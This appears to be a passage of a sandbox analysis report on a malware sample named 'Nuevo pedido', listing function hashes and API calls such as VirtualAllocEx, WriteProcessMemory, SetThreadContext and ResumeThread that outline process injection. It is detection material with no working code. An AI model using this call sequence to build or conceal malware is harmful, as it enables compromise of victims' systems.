Instruction ID: c20936e7ae997bb6af434364cfdf26cb2b76a33d0f245798213d910a16b9a092
Opcode Fuzzy Hash: 0174f0a15ac47d22ea9386c8bb0c35b2568bfaca640bd6ed91308d8777e74008
Instruction Fuzzy Hash: F5A16B71D00219DFDB10DF68D841BDEBBB2FF48314F1481AAE858A7290DB759985CFA2

Function 02670CD0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02670F06

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bebade3fe57394d4674d91fbb4402ab4464f2cc111b8c4e1505a7da6cc6d7010
Instruction ID: 7e49936ade900d551c7d0c804b7c871e11fe721d8085a7dbb3ea193e9b68febd
Opcode Fuzzy Hash: bebade3fe57394d4674d91fbb4402ab4464f2cc111b8c4e1505a7da6cc6d7010
Instruction Fuzzy Hash: 4C916C71D00219DFDB14DF68D840BDEBBB2FF48314F1481A9E808A7290DB759985CFA2

Function 0275590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027559C9

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6f82a45e98aca769f9508cea223bb015f147e2c1766f55bdeb18317ac5a8cede
Instruction ID: 77311da3ea84bd291070bfa744f0f1cfad9be3df36225aaaf5fd48c8f8a71a3a
Opcode Fuzzy Hash: 6f82a45e98aca769f9508cea223bb015f147e2c1766f55bdeb18317ac5a8cede
Instruction Fuzzy Hash: 7F41D2B0C00719DFDB24CFA9C884B8EFBB5BF49304F64806AD409AB255DB756989CF90

Function 027544C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027559C9

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b2cf29a237f5924db3fed3035f18e45840d53b29bfc558531dd0e60ed5b57a5b
Instruction ID: 5deda5bb49a136e958403ecd171d13b6b16e62f9356e48f2e599a9235dddc5fa
Opcode Fuzzy Hash: b2cf29a237f5924db3fed3035f18e45840d53b29bfc558531dd0e60ed5b57a5b
Instruction Fuzzy Hash: 1141D2B0C00729CFDB24CFA9C844B9EFBB5BF49304F64806AD409AB255DBB56949CF90

Function 02670A40 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02670AD8

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fc7b807a526d6deb9048a1a1d4250926b2448838cf50beb0bd99c60b760f3092
Instruction ID: ec46c2e1b15a8e559d86e7adc2877d3c1f82bd18bd498e7208bd03306f0e3512
Opcode Fuzzy Hash: fc7b807a526d6deb9048a1a1d4250926b2448838cf50beb0bd99c60b760f3092
Instruction Fuzzy Hash: 723178B19003499FCB10CFAAD841BEEBBF0FF48320F10842AE958A7291D7789544CBA4

Function 02670A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02670AD8

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bbd5fe5a9f785d0595d990d3d422a78b3f1459898d94e7c013cc0b954b6b2845
Instruction ID: 7bd52449ee44fc762630e675ba54315798b380064736aa8256bd148fdf95062f
Opcode Fuzzy Hash: bbd5fe5a9f785d0595d990d3d422a78b3f1459898d94e7c013cc0b954b6b2845
Instruction Fuzzy Hash: 992125B1900359DFCB10CFA9C985BDEBBF5FF48314F10842AE958A7251C778A944CBA4

Function 026708A8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0267092E

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b2865f088d972232b5906399dc5871c574754b6e76aca7842d74043622cdfb49
Instruction ID: 108c594a25850922d835b3582f26592176e04bc4200008f43aa751540ba288e9
Opcode Fuzzy Hash: b2865f088d972232b5906399dc5871c574754b6e76aca7842d74043622cdfb49
Instruction Fuzzy Hash: 292136B19003099FDB10CFAAC4847EEFBF4EF48324F10842AD459A7241CB789985CFA5

Function 02670B30 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02670BB8

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2bc885e37839727efd38be8139bcf148b98105076c28caf1aeddf2199afcf0ea
Instruction ID: 58a4b33fc4f6413b1ca33f50d57540bc17f0c2b85593cce845313736adc91d8e
Opcode Fuzzy Hash: 2bc885e37839727efd38be8139bcf148b98105076c28caf1aeddf2199afcf0ea
Instruction Fuzzy Hash: C02148B1800359DFCB10CFAAC880AEEFBF5FF48314F108429E559A7250D7399940CBA4

Function 0275D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D717

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 97ecdfd024bb747d4cbebea7a1f8bae88e488fbd95e066dca30e914ef1284b80
Instruction ID: faa7bffbd373248dccd9764a43e7da77895d1bf73827b7d54d2b7750ad0f98f0
Opcode Fuzzy Hash: 97ecdfd024bb747d4cbebea7a1f8bae88e488fbd95e066dca30e914ef1284b80
Instruction Fuzzy Hash: 3E2103B5900259EFDB10CFAAD584ADEFBF4EB48314F10842AE918B3310C375A940CFA1

Function 02670B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02670BB8

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6bf4cd3d32922562d35d93716b5566641afb083756b8c86295b428767f6d5d77
Instruction ID: 6bb22201c03ebc90ff7b1a617d9b1e9154e8b89ec4ee68bc06aa45b5d058f0b0
Opcode Fuzzy Hash: 6bf4cd3d32922562d35d93716b5566641afb083756b8c86295b428767f6d5d77
Instruction Fuzzy Hash: 132125B1900359DFCB10DFAAC980AEEFBF5FF48324F10842AE559A7250D7399944CBA5

Function 026708B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0267092E

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 475ddd0a02f27e1fc4b8099c77e2c29e2e8f6028df546cc8a246908bff3834a0
Instruction ID: 5c9649d73021bfe5cc16272d318e199203a59c43f27f4d213c6eb830828c5ba9
Opcode Fuzzy Hash: 475ddd0a02f27e1fc4b8099c77e2c29e2e8f6028df546cc8a246908bff3834a0
Instruction Fuzzy Hash: A52149B19003099FDB10DFAAC485BEEFBF4EF88324F108429D459A7240CB789945CFA5

Function 0275D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D717

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ab3db1f602e0d39f55281c4273a6417b0fc452ff2a7a73ab337c70cb2475afa
Instruction ID: edf9cbad21c11c809b45eef9f8eb39c4b7666314c61c49140ca12836d63ab1d1
Opcode Fuzzy Hash: 4ab3db1f602e0d39f55281c4273a6417b0fc452ff2a7a73ab337c70cb2475afa
Instruction Fuzzy Hash: 9D21E4B5900259EFDB10CF9AD584ADEFBF4FB48310F14841AE914A3310D375A940CFA5

Function 02670980 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026709F6

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 39f2055c77739dddfd0d948f72df5c969ea1ac8c4632ca272cbb35fa9fb71450
Instruction ID: bf27d4ffdc94b52a8f744491643eb490fb981b4cf43fdf3d91c58480e10bba28
Opcode Fuzzy Hash: 39f2055c77739dddfd0d948f72df5c969ea1ac8c4632ca272cbb35fa9fb71450
Instruction Fuzzy Hash: 202158729002489FCB10DFAAD445ADEFFF5EB88320F10841AE555A7260CB75A580CFA5

Function 06F3FB98 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F3FC02

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9fe83408cbc7d49c88cfdf95d8b59cc9894728463a0562707aaf95e5443d6609
Instruction ID: 6d3eabd138e817d981d04a95464c061eeb146ee91f6d387010ee82a296ab76d3
Opcode Fuzzy Hash: 9fe83408cbc7d49c88cfdf95d8b59cc9894728463a0562707aaf95e5443d6609
Instruction Fuzzy Hash: 97116AB1C002598FCB10DFAAC4447EEFBF5EB88324F20842AD419A7250CB35A940CBA4

Function 02670988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026709F6

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 81ddd1ed9a996f3862524e235fa5fb69bc35d6ffada1ceff62e4da9c02e9079b
Instruction ID: 7422ff77061486d379f4cde8110c4cac50d3372c3347c1601a9395806eb88663
Opcode Fuzzy Hash: 81ddd1ed9a996f3862524e235fa5fb69bc35d6ffada1ceff62e4da9c02e9079b
Instruction Fuzzy Hash: 921126719002499FCB10DFAAC844BDFFFF5EB88324F108419E559A7250CB75A544CFA5

Function 06F3FBA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F3FC02

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f9f67ce602d6074b55499ee30fd46e2477f82000c82841cdd233735b760cf065
Instruction ID: ffb9f00479dcb4eb7b4ab61204ec39b43f1dc5ce2f0bd96da228dc19a8652540
Opcode Fuzzy Hash: f9f67ce602d6074b55499ee30fd46e2477f82000c82841cdd233735b760cf065
Instruction Fuzzy Hash: DE1136B1D002598FCB20DFAAC445BDEFBF4EB88324F208429D459A7250CB79A944CFA5

Function 02674C80 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02674CE5

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7eb285d343d897f3e5439d0d86b24669c8aba6091018cfb2bb83f5d58a0e7fbb
Instruction ID: 300f9a541316d9b5aec9d8104c52456968c878bdb535ba351482ad8a068f5992
Opcode Fuzzy Hash: 7eb285d343d897f3e5439d0d86b24669c8aba6091018cfb2bb83f5d58a0e7fbb
Instruction Fuzzy Hash: 781102B5800249DFDB10CF99C545BDEBBF8EB48310F108419E958A3210C375A940CFA5

Function 0275AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0275AFFE

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9ee4667b4547acfa20da9ac0a1cc6a9e7bf28e267062b4e65ccc9932dfbd4ce2
Instruction ID: 1c30e273c23efaaba7803cd51ea559564dcca460fc4768a314c6def8379702f3
Opcode Fuzzy Hash: 9ee4667b4547acfa20da9ac0a1cc6a9e7bf28e267062b4e65ccc9932dfbd4ce2
Instruction Fuzzy Hash: 4111DFB6D002598FCB14CF9AC444ADEFBF4AF88228F10846AD869A7210D379A545CFA5

Function 02674C88 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02674CE5

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5b7f577b9484f0106115f4687464c0bf25b37229c7d153d30c13d2cde19945ea
Instruction ID: dfd0945c14657c9737ff5c18f317681acc9f1623b66ab43ffc9c06fcefe6a32a
Opcode Fuzzy Hash: 5b7f577b9484f0106115f4687464c0bf25b37229c7d153d30c13d2cde19945ea
Instruction Fuzzy Hash: 6C11F2B5800249DFCB10CF9AD589BDEFBF8EB48324F108419E558A7210C775A544CFA5

Function 00BBD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727367403.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
Instruction ID: 581fda97e36f07f4380233ff7fc34ab6b863e3771ede564c070671b195d6c1bf
Opcode Fuzzy Hash: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
Instruction Fuzzy Hash: D1212871500204DFDB05DF14D9C0B66BFA5FB94314F20C6A9D9094B356D37AE856C6A2

Function 00E0D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
Instruction ID: ca911c107ccca57c1003ef369f91b9138e7d6484bda20c7b33d33cf547f88dbd
Opcode Fuzzy Hash: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
Instruction Fuzzy Hash: 9F210471508304EFDB05DF94D9C0B26BBA5FB84318F20C66DE8095B2A6C336D896CB61

Function 00E0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
Instruction ID: 4264615849dba07012dc3fa4310b32f6292a914cf635cf810bab46e223366690
Opcode Fuzzy Hash: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
Instruction Fuzzy Hash: C821F271608200DFDB14DF54D984B26BBA6EB84318F20C569D84E5B296C33AD887CB61

Function 00E0D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
Instruction ID: a09051e606c65a65067a9dda346b4b4d7f5621bfba1858ff9f82c2c28fe02721
Opcode Fuzzy Hash: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
Instruction Fuzzy Hash: 8821837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62

Function 00BBD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727367403.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: d2c74870ce2813ff94bbfea8f1777ad0db8d64a4f1ed8cf2bfdf797882e0cb07
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C4110372504240CFCB02CF00D5C4B66BFB1FB94324F24C6A9D8090B356C37AE85ACBA2

Function 00E0D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727975528.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: d1dfb7d06571bcab76e5352e397086b29a1ba23414d8f9e289e7682a73e1d4af
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: BB11BB75508280DFCB02CF94C9C4B15BBA1FB84318F24C6AAD8494B6A6C33AD85ACB61

Non-executed Functions

Function 06F332D0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

XK, xrefs: 06F3354D
,0, xrefs: 06F3352E

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: XK$,0
API String ID: 0-3597542875
Opcode ID: 66afbe3cf8eb70159eed4ced61455a21ba9382be363eeac5cd521da554763294
Instruction ID: 7994d323fd9b0ac2bd32c98d284878b2c9061cfd05d129254df9419d5336f3c9
Opcode Fuzzy Hash: 66afbe3cf8eb70159eed4ced61455a21ba9382be363eeac5cd521da554763294
Instruction Fuzzy Hash: 9951D17292569AEFDB48CF64F08A018BFB3FF89344F2CC495C0859A298DF758A60C745

Function 06F332E0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

XK, xrefs: 06F3354D
,0, xrefs: 06F3352E

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: XK$,0
API String ID: 0-3597542875
Opcode ID: f4fd5ec1cff50a08fb0e6410d690592aa1c94d924a390d968d0c95fa8da5811a
Instruction ID: 9c71e722708b82acbf79c3b012d4ebfd9d61e1898e643ce5e281d3f11c5c0426
Opcode Fuzzy Hash: f4fd5ec1cff50a08fb0e6410d690592aa1c94d924a390d968d0c95fa8da5811a
Instruction Fuzzy Hash: 1551F47392569AEFDB88CF54F08A018BFB3FB89341F2CC495C0859A288DF758A60C745

Function 06F36D88 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

O5>M, xrefs: 06F3709F

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: O5>M
API String ID: 0-2302383708
Opcode ID: 02c9a2070ae2240ae26012486d3e40c38f54508bfd8a072be4944f8cf00a3ac1
Instruction ID: fa1e3b01d2853c6403bc8b05418d961e7436037002fb7314840d179b592b02d2
Opcode Fuzzy Hash: 02c9a2070ae2240ae26012486d3e40c38f54508bfd8a072be4944f8cf00a3ac1
Instruction Fuzzy Hash: F0B117B1E15229DFDB44CFAAD98089EFBB2FF88300F24D52AD415EB255D73099418FA4

Function 06F36D78 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

O5>M, xrefs: 06F3709F

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: O5>M
API String ID: 0-2302383708
Opcode ID: fe944277e4bcb559caa1a8c57f8376d28e25c9da07891ea0088a1f3805d7c2fa
Instruction ID: 176a5f561b0d7d51dd69c327a4c68078b315b99c1bd56d04d978cfe214c3d16c
Opcode Fuzzy Hash: fe944277e4bcb559caa1a8c57f8376d28e25c9da07891ea0088a1f3805d7c2fa
Instruction Fuzzy Hash: 4AB13871E152199FDB44CFAAD98089EFBF2FF89300F24D52AD415EB254D73099018FA4

Function 06F354F8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

nlh_, xrefs: 06F35599

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: nlh_
API String ID: 0-3984638114
Opcode ID: 8f9bbe18445793d5c519369f3665d1e316919129db0f47379a58f0ca00110797
Instruction ID: e3b5689875290db4b0a7a74751c0adab20602abb6614c12aad3060ef9b0919dc
Opcode Fuzzy Hash: 8f9bbe18445793d5c519369f3665d1e316919129db0f47379a58f0ca00110797
Instruction Fuzzy Hash: 09515D75E15219DFCB48CFEAE4855AEFBF2AF88300F10942AE415B7254D7385A41CF90

Function 06F35508 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

nlh_, xrefs: 06F35599

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: nlh_
API String ID: 0-3984638114
Opcode ID: ee00df8664263cbe39a6854fe58d776d3417d92e1a19ca652b3038f40dbe6b00
Instruction ID: 1d59a2a3e44f7f6e7c25326dd1292c32b9b29ccb09a8831fb499ea92bc2ab7d6
Opcode Fuzzy Hash: ee00df8664263cbe39a6854fe58d776d3417d92e1a19ca652b3038f40dbe6b00
Instruction Fuzzy Hash: 0A514D75E15219CFCB84CFEAD5855AEFBF2AF88304F10942AE416B7254D7349A41CF90

Function 06F33080 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

f:, xrefs: 06F3316B

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: f:
API String ID: 0-2393945263
Opcode ID: 509cd7b05d78cfadc179dd24d2b5f89608a0aa802c6ab79482b98bf8c0fa6f92
Instruction ID: 09631e671766d053469ace352b673141c97940728b05b1da39e7c27fdbe2c9dd
Opcode Fuzzy Hash: 509cd7b05d78cfadc179dd24d2b5f89608a0aa802c6ab79482b98bf8c0fa6f92
Instruction Fuzzy Hash: 7241F4B2E0521A9FDB48DFAAC8415AEFBB2BF88300F24D52AC415A7254D7349A41CF95

Function 06F33070 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

f:, xrefs: 06F3316B

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: f:
API String ID: 0-2393945263
Opcode ID: 389378c297845183b3fc6dcd7cac9ccdb97a665c08fb117e70848878dc15d4ea
Instruction ID: 97034e01564a843c600446fecc4747853af5df3460e183720ce9aca04ac1329f
Opcode Fuzzy Hash: 389378c297845183b3fc6dcd7cac9ccdb97a665c08fb117e70848878dc15d4ea
Instruction Fuzzy Hash: FC4116B1E0121A9FDB88CFAAC8815AEFBF2FF88300F14D52AC415A7254D7349A41CF95

Function 06F3D878 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b39f383dc6957b4945493a4766d4bfdedd16a1b18d6db42e0f987dba75782e
Instruction ID: d7a11544203f1124a9c050c6584164f2df362cb1d4fdf811a003539ef3baa247
Opcode Fuzzy Hash: 83b39f383dc6957b4945493a4766d4bfdedd16a1b18d6db42e0f987dba75782e
